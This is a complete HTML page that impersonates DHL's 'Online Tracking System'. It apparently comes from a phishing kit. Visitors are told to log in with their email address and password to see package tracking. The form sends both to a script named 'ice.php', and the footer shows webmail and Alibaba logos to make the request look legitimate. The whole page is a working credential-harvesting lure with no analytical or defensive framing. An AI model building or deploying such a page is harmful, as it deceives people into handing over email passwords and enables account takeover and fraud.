<html hola_ext_inject="inited"><head>
<meta http-equiv="content-type" content="text/html; charset=windows-1252">
<link rel="shortcut icon" href="http://www.dhl.com/img/favicon.gif" type="image/gif"><title>DHL | Tracking System</title></head>

<body topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0" bgcolor="FCD32F" marginheight="0" marginwidth="0">

<table height="100%" align="center" cellspacing="0" width="100%">

<tbody><tr><td height="10%">
</td></tr>




<tr><td height="20%" bgcolor="#000000">

	<table align="center" width="900"><tbody><tr>

	<td>
	<img src="DHL_files/logo.jpg" height="70" width="220">
	</td>



	<td>
	<div align="right">
	<br><br><br>
	<font face="calibri" color="#ffffff" size="+2">
	Online Tracking System
	</font></div><font face="calibri" color="#ffffff" size="+2">
		
	</font></td>
		
	</tr></tbody></table>

</td></tr>




<tr><td height="55%">
	
	<table height="300" align="center" width=""><tbody><tr>
	
	<td bgcolor="" width="580">

		<table align="left" width="500">

				<tbody><tr><td>

				<form method="post" action="ice.php">
			
				<font face="calibri" color="" size="3">

				<br>

				<font face="calibri" color="#DF0101" size="+2">
				<b>Track Package</b><br>
				<font color="#000000" size="3"><b>Login your E-mail  to view package tracking information</b></font>
				</font>
				<br><br>

				<input name="email" style="width:375px; height:40px; font-family: Verdana; font-size: 14px; color:#000000; 
				background-color: #FAFAFA; border: solid 2px #FF4000; padding: 10px" "="" required="" placeholder="Enter Email" type="email">	

				<p>

				<input name="pass" style="width:375px; height:40px; font-family: Verdana; font-size: 14px; color:#000000; 
				background-color: #FAFAFA; border: solid 2px #FF4000; padding: 10px" "="" required="" placeholder="Enter Password" type="password">
	


				</p></font><p><font face="calibri" color="" size="3">

				<input value="Login To View" style="width:375px; height:50px; background-color: #DF0101; border: solid 3px #DF0101; 
				font-family: Verdana; font-size: 18px; font-weight: light; color: #ffffff; -moz-border-radius: 3px; -webkit-border-radius: 3px; 
				-khtml-border-radius: 3px; border-radius: 3px;" type="submit">				
	
				</font>

				</p></form>			

				</td></tr>
				
				</tbody></table>
	</td>


	<td width="80"></td>



	<td bgcolor="#00000" width="220">

	
	<div align="center">
	<img src="DHL_files/logo.jpg" height="50" width="170">
	</div>
	<br>

	<div align="center">
	<img src="DHL_files/img10.jpg" height="170" width="170">
	</div>
	</td>

	</tr></tbody></table>

</td></tr>



<tr><td height="10%" bgcolor="#ffffff">

	<table align="center"><tbody><tr>

	<td>
	<img src="DHL_files/163.jpg" height="35" width="110">
	</td>

	<td width="25"></td>

	<td>
	<img src="DHL_files/globalsources.gif" height="40" width="120">
	</td>

	<td width="15"></td>

	<td>
	<img src="DHL_files/hotmail.jpg" height="30" width="120">
	</td>

	<td width=""></td>

	<td>
	<img src="DHL_files/yahoo.png" height="20" width="100">
	</td>

	<td width=""></td>

	<td>
	<img src="DHL_files/yeah.gif" height="40" width="130">
	</td>
	
	<td width=""></td>

	<td>
	<img src="DHL_files/126.gif" height="23" width="90">
	</td>

	<td width="10"></td>

	<td>
	<img src="DHL_files/alibaba.png" height="27" width="130">
	</td>

	</tr></tbody></table></td></tr>




<tr><td height="5%" bgcolor="#000000">
</td></tr>

</tbody></table>



</body></html>